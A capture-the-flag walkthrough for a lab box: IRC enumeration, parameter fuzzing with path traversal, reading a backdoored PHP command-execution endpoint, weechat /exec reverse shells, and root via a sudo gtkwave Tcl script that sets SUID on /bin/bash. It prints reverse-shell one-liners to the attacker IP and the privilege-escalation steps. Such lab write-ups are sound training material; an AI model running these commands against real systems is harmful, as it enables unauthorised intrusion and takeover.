image-20250527214031548

Port scan

image-20250527214105625

Port 80 serves only the default Apache page; the directory scan turned up nothing else.

image-20250527214551581

Port 6667, however, runs an IRC service (Internet Relay Chat).

Connect with nc and send the standard IRC registration commands (NICK, then USER) to register a nickname and user info:

┌──(root㉿kali)-[~]
└─# nc 192.168.56.106 6667
:irc.local NOTICE * :*** Looking up your hostname...
NICK kali_pentester
:irc.local NOTICE * :*** Could not resolve your hostname: Request timed out; using your IP address (192.168.56.103) instead.

USER kali 0 * :Kali Pentester
:irc.local 001 kali_pentester :Welcome to the Localnet IRC Network kali_pentester!kali@192.168.56.103
:irc.local 002 kali_pentester :Your host is irc.local, running version InspIRCd-3
:irc.local 003 kali_pentester :This server was created 09:36:52 May 27 2025
:irc.local 004 kali_pentester irc.local InspIRCd-3 iosw biklmnopstv :bklov
:irc.local 005 kali_pentester AWAYLEN=200 CASEMAPPING=rfc1459 CHANLIMIT=#:20 CHANMODES=b,k,l,imnpst CHANNELLEN=64 CHANTYPES=# ELIST=CMNTU HOSTLEN=64 KEYLEN=32 KICKLEN=255 LINELEN=512 MAXLIST=b:100 :are supported by this server
:irc.local 005 kali_pentester MAXTARGETS=20 MODES=20 NAMELEN=128 NETWORK=Localnet NICKLEN=30 PREFIX=(ov)@+ SAFELIST STATUSMSG=@+ TOPICLEN=307 USERLEN=10 USERMODES=,,s,iow WHOX :are supported by this server
:irc.local 251 kali_pentester :There are 0 users and 0 invisible on 1 servers
:irc.local 253 kali_pentester 1 :unknown connections
:irc.local 254 kali_pentester 0 :channels formed
:irc.local 255 kali_pentester :I have 0 clients and 0 servers
:irc.local 265 kali_pentester :Current local users: 0 Max: 1
:irc.local 266 kali_pentester :Current global users: 0 Max: 1
:irc.local 375 kali_pentester :irc.local message of the day
:irc.local 372 kali_pentester : **************************************************
:irc.local 372 kali_pentester : * H E L L O *
:irc.local 372 kali_pentester : * This is a private irc server. Please contact *
:irc.local 372 kali_pentester : * the admin of the server for any questions or *
:irc.local 372 kali_pentester : * issues ShadowSec directory. *
:irc.local 372 kali_pentester : **************************************************
:irc.local 372 kali_pentester : * The software was provided as a package of *
:irc.local 372 kali_pentester : * Debian GNU/Linux <https://www.debian.org/>. *
:irc.local 372 kali_pentester : * However, Debian has no control over this *
:irc.local 372 kali_pentester : * server. *
:irc.local 372 kali_pentester : **************************************************
:irc.local 372 kali_pentester : (The sysadmin possibly wants to edit </etc/inspircd/inspircd.motd>)
:irc.local 376 kali_pentester :End of message of the day.
PING :irc.local
ERROR :Closing link: (kali@192.168.56.103) [Ping timeout: 120 seconds]
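The same registration exchange in code, added here as an example (it is not part of the original writeup): a small Python client that sends NICK/USER, answers the server's PING with PONG (the nc session above was dropped with "Ping timeout" precisely because no PONG was typed back within the 120-second window), and collects the 372 MOTD lines in which the ShadowSec hint appeared. The host and nick are the lab values used on this page; the sample server lines at the bottom are constructed from the shape of the replies above so the parser can be exercised offline.

```python
"""Minimal IRC registration client (added example, not from the original page)."""
import socket


def handle_server_line(line: str):
    """Process one raw server line.
    Returns (reply, motd_text): reply is a line to send back (PONG for PING,
    otherwise None); motd_text is the text of a 372 (MOTD) line, else None."""
    if line.startswith("PING"):
        # 'PING :irc.local' must be answered with 'PONG :irc.local',
        # otherwise the server closes the link after its ping timeout.
        return "PONG" + line[4:], None
    parts = line.split(" ", 3)
    # numeric replies look like ':irc.local 372 <nick> :<text>'
    if len(parts) == 4 and parts[1] == "372":
        return None, parts[3].lstrip(":").strip()
    return None, None


def collect_motd(lines):
    """Extract the MOTD text from a list of raw server lines."""
    motd = []
    for line in lines:
        _, text = handle_server_line(line)
        if text is not None:
            motd.append(text)
    return motd


def register_and_read_motd(host, port=6667, nick="kali_pentester",
                           user="kali", realname="Kali Pentester", timeout=30):
    """Connect, send NICK/USER, answer PINGs, and return the MOTD lines.
    Stops at 376 (end of MOTD) or 422 (no MOTD) and QUITs cleanly."""
    motd = []
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(f"NICK {nick}\r\nUSER {user} 0 * :{realname}\r\n".encode())
        buf = b""
        while True:
            chunk = s.recv(4096)
            if not chunk:
                break
            buf += chunk
            while b"\r\n" in buf:
                raw, buf = buf.split(b"\r\n", 1)
                line = raw.decode(errors="replace")
                reply, text = handle_server_line(line)
                if reply:
                    s.sendall((reply + "\r\n").encode())
                if text is not None:
                    motd.append(text)
                if f" 376 {nick} " in line or f" 422 {nick} " in line:
                    s.sendall(b"QUIT :done\r\n")
                    return motd
    return motd


# Constructed sample of the server's replies (shape taken from the nc session
# above) so the parser can be exercised without a live server.
SAMPLE_LINES = [
    ":irc.local NOTICE * :*** Looking up your hostname...",
    ":irc.local 001 kali_pentester :Welcome to the Localnet IRC Network",
    ":irc.local 375 kali_pentester :irc.local message of the day",
    ":irc.local 372 kali_pentester : * issues ShadowSec directory. *",
    "PING :irc.local",
    ":irc.local 376 kali_pentester :End of message of the day.",
]

if __name__ == "__main__":
    print(collect_motd(SAMPLE_LINES))
    # live run against the lab box: print(register_and_read_motd("192.168.56.106"))
```

The client stops reading at numeric 376, so it returns as soon as the MOTD is complete instead of sitting in the connection until the server times it out.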

The MOTD leaks a directory name: ShadowSec.

image-20250527215927875

It reveals a user ID: ll104567

Scanning /ShadowSec/ with a large wordlist finds:

/bydataset.php

Nothing to see here. 

Fuzz this page for parameters.

First measure the size of the "invalid" response so it can be filtered out:

curl -s -w "%{size_download}\n" "http://192.168.56.106/ShadowSec/bydataset.php?abc=123" -o /dev/null

Then fuzz parameter names with a path-traversal value, dropping every response of that size (21 bytes here):

ffuf -u 'http://192.168.56.106/ShadowSec/bydataset.php?FUZZ=../../.././../../etc/passwd' \
-w /myift/fuzzDicts/fuzzDicts-master/paramDict/AllParam.txt -fs 21 -c

This turns up a file parameter that reads files from disk.

image-20250528135709525

Read the script's own source through the php:// wrapper (the script wraps the given path in php://filter/convert.base64-encode and base64-decodes the result itself, so ?file=bydataset.php returns the source in plain text):

image-20250528135847860

<?php

function decrypt($input) {
    // payload arrives reversed: undo the reversal, then base64-decode
    $reversed = strrev($input);
    echo "Reversed: " . $reversed . "\n";

    $decoded = base64_decode($reversed);
    echo "Decoded: " . $decoded . "\n";

    if ($decoded === false) {
        echo "Base64 decoding failed.\n";
        return false;
    }

    // the decoded string must start with "cmd:"; everything after it is the command
    if (strpos($decoded, 'cmd:') === 0) {
        return substr($decoded, 4);
    }

    return false;
}

if ($_SERVER['REQUEST_METHOD'] === 'GET' && isset($_GET['file'])) {
    $file = $_GET['file'];
    // the only filter is a substring check for "phpinfo"
    if (stripos($file, 'phpinfo') !== false) {
        exit('Access Denied');
    }
    $filterUrl = 'php://filter/convert.base64-encode/resource=' . $file;
    $data = @file_get_contents($filterUrl);
    if ($data === false) {
        exit('Failed to read file');
    }
    echo base64_decode($data);
    exit;
} elseif ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['auth']) && isset($_POST['payload'])) {
    $auth = $_POST['auth'];
    $payload = $_POST['payload'];

    if ($auth !== 'LetMeIn123!') {
        exit('Invalid Auth Token.');
    }

    $command = decrypt($payload);
    if ($command !== false) {
        // exec() with one argument returns only the last line of output
        $output = exec($command);
        echo "<pre>$output</pre>";
    } else {
        echo "Payload decode failed.\n";
    }
    exit;
} else {
    echo "Nothing to see here.";
}
?>

The logic is simple: the POST branch passes whatever survives decrypt() straight to exec().

auth parameter: must be LetMeIn123!
payload parameter: needs two encoding layers, applied in this order:
prepend cmd: to the command
Base64-encode the resulting cmd:<command> string
reverse the Base64 string (the server strrev()s it back before decoding)

Note that exec() returns only the last line of the command's output, so a multi-line result is truncated in the response; a reverse shell sidesteps that.

image-20250528141218271

That is command execution, so just pop a reverse shell.

image-20250528141336978

image-20250528143115879

weechat is installed.

Note that weechat only starts once the shell has been upgraded to a stable, fully interactive TTY.

image-20250528150806982

Inside weechat, /exec runs a system command, so either of these gives a reverse shell:

/exec busybox nc 192.168.56.103 1234 -e /bin/sh

/exec !bash -i >& /dev/tcp/192.168.56.103/1234 0>&1

image-20250528151229795

Now privilege escalation.

chatlake@PyCrt:~$ sudo -l
Matching Defaults entries for chatlake on PyCrt:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User chatlake may run the following commands on PyCrt:
(ALL) NOPASSWD: /usr/bin/systemctl start irc_bot.service

We can't view this file directly, but we can start it; systemctl cat irc_bot.service prints the complete unit file of the service:
chatlake@PyCrt:~$ systemctl cat irc_bot.service
# /etc/systemd/system/irc_bot.service
[Unit]
Description=IRC Bot Service
After=network.target

[Service]
User=pycrtlake
Group=pycrtlake
WorkingDirectory=/usr/local/bin
ExecStart=/usr/bin/python3 /usr/local/bin/irc_bot.py
Restart=always
RestartSec=5
StandardOutput=syslog
StandardError=syslog
Environment=PYTHONUNBUFFERED=1

[Install]
WantedBy=multi-user.target
chatlake@PyCrt:~$ ls
user.txt
chatlake@PyCrt:~$ find / -name "user.txt" 2>/dev/null
/home/chatlake/user.txt
chatlake@PyCrt:~$ find / -name "irc_bot.py" 2>/dev/null
/usr/local/bin/irc_bot.py
chatlake@PyCrt:~$ find / -name "irc_bot.service" 2>/dev/null
/etc/systemd/system/irc_bot.service

The service runs as user pycrtlake, so whatever the bot executes runs as that user.

Start the service (the sudo /usr/bin/systemctl start irc_bot.service entry from sudo -l) and take a look.

After it is running, relaunch weechat, add a server named irc and connect to the local IRC server:

/server add irc 127.0.0.1/6667
/connect irc

image-20250528154037703

There are six channels.

The user ID found earlier was ll104567; set it as the nickname:

/nick ll104567

Joining the channels shows nothing at first:

/join #chan1

In channel 6, sending anything makes a hint arrive after a moment:

image-20250528154607689

03:45:07 ll104567 | 2
03:45:08 ll104567 | 1
03:45:08 ll104567 | 3
03:45:48 @admin | My friends and I are chatting on it, but we all follow the formatting requirements. Finally, we need to:) End

So messages must end with :)

03:48:44 ll104567 | 111:)
03:48:48 @admin | My friends and I are chatting on it, but we all follow the formatting requirements. Finally, we need to:) End

Chatting in the channel gets nowhere, so open a private query with admin:

/query admin

image-20250528155438119

After a lot of trial and error it turns out the message has to be sent in #chan1,

and admin then replies in the private query ...

Sending numbers gets symbols and letters back; these are clearly ASCII codes.

image-20250528160153309

Commands can be executed.

image-20250528160206259

Pop a reverse shell.

image-20250528160732605

The shell is very unstable, so stabilize it immediately after getting it.

image-20250528160703360

pycrtlake@PyCrt:~$ sudo -l
Matching Defaults entries for pycrtlake on PyCrt:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User pycrtlake may run the following commands on PyCrt:
(ALL) NOPASSWD: /usr/bin/gtkwave

Command execution through gtkwave.

pycrtlake@PyCrt:~$ sudo gtkwave -h
Could not initialize GTK! Is DISPLAY env var/xhost set?

Usage: gtkwave [OPTION]... [DUMPFILE] [SAVEFILE] [RCFILE]

-n, --nocli=DIRPATH use file requester for dumpfile name
-f, --dump=FILE specify dumpfile name
-F, --fastload generate/use VCD recoder fastload files
-o, --optimize optimize VCD to FST
-a, --save=FILE specify savefile name
-A, --autosavename assume savefile is suffix modified dumpfile name
-r, --rcfile=FILE specify override .rcfile name
-d, --defaultskip if missing .rcfile, do not use useful defaults
-D, --dualid=WHICH specify multisession identifier
-l, --logfile=FILE specify simulation logfile name for time values
-s, --start=TIME specify start time for LXT2/VZT block skip
-e, --end=TIME specify end time for LXT2/VZT block skip
-t, --stems=FILE specify stems file for source code annotation
-c, --cpu=NUMCPUS specify number of CPUs for parallelizable ops
-N, --nowm disable window manager for most windows
-M, --nomenus do not render menubar (for making applets)
-S, --script=FILE specify Tcl command script file for execution
-T, --tcl_init=FILE specify Tcl command script file to be loaded on startup
-W, --wish enable Tcl command line on stdio
-R, --repscript=FILE specify timer-driven Tcl command script file
-P, --repperiod=VALUE specify repscript period in msec (default: 500)
-X, --xid=XID specify XID of window for GtkPlug to connect to
-1, --rpcid=RPCID specify RPCID of GConf session
-2, --chdir=DIR specify new current working directory
-3, --restore restore previous session
-4, --rcvar specify single rc variable values individually
-5, --sstexclude specify sst exclusion filter filename
-I, --interactive interactive VCD mode (filename is shared mem ID)
-C, --comphier use compressed hierarchy names (slower)
-g, --giga use gigabyte mempacking when recoding (slower)
-L, --legacy use legacy VCD mode rather than the VCD recoder
-v, --vcd use stdin as a VCD dumpfile
-O, --output=FILE specify filename for stdout/stderr redirect
-z, --slider-zoom enable horizontal slider stretch zoom
-V, --version display version banner then exit
-h, --help display this help then exit
-x, --exit exit after loading trace (for loader benchmarks)

VCD files and save files may be compressed with zip or gzip.
GHW files may be compressed with gzip or bzip2.
Other formats must remain uncompressed due to their non-linear access.
Note that DUMPFILE is optional if the --dump or --nocli options are specified.
SAVEFILE and RCFILE are always optional.

Report bugs to <bybell@rocketmail.com>.

-S, --script=FILE and -T, --tcl_init=FILE: load a Tcl script file

This is the most direct risk. Tcl is a scripting language, and if gtkwave loads and executes an arbitrary Tcl script through these options, an attacker can put system commands in that script (Tcl's exec command, e.g. exec chmod 4755 /bin/sh or exec bash -i).
Because pycrtlake can sudo gtkwave, that Tcl script runs as root, giving arbitrary command execution and a direct privilege escalation.
Risk level: high. This is the classic way to abuse this kind of binary.

First create the exploit file:

echo "exec chmod u+s /bin/bash" > /tmp/root_shell.tcl

Running gtkwave fails at this point because there is no graphical display (the GTK error shown above).

Xvfb can provide a virtual display.

It runs a virtual X server, so graphical applications can start on a machine with no physical display or desktop (a server, for example).

Start Xvfb:

Xvfb :99 -screen 0 1024x768x24 &

In the terminal session that will run gtkwave, set the DISPLAY environment variable to point at the Xvfb instance. sudo's env_reset keeps DISPLAY by default, so the root gtkwave process sees it:

export DISPLAY=:99
pycrtlake@PyCrt:~$ echo "exec chmod u+s /bin/bash" > /tmp/root_shell.tcl
pycrtlake@PyCrt:~$ sudo /usr/bin/gtkwave -S /tmp/root_shell.tcl

GTKWave Analyzer v3.3.118 (w)1999-2023 BSI

GTKWAVE | Use the -h, --help command line flags to display help.

(gtkwave:1304): dconf-WARNING **: 06:57:12.187: failed to commit changes to dconf: Failed to execute child process ?dbus-launch? (No such file or directory)
GTKWAVE | Executing Tcl script '/tmp/root_shell.tcl'
^C
pycrtlake@PyCrt:~$ ls -al /bin/bash
-rwsr-xr-x 1 root root 1168776 Apr 18 2019 /bin/bash
pycrtlake@PyCrt:~$ bash -p
bash-5.0# whoami
root
bash-5.0#

Then grab the flag.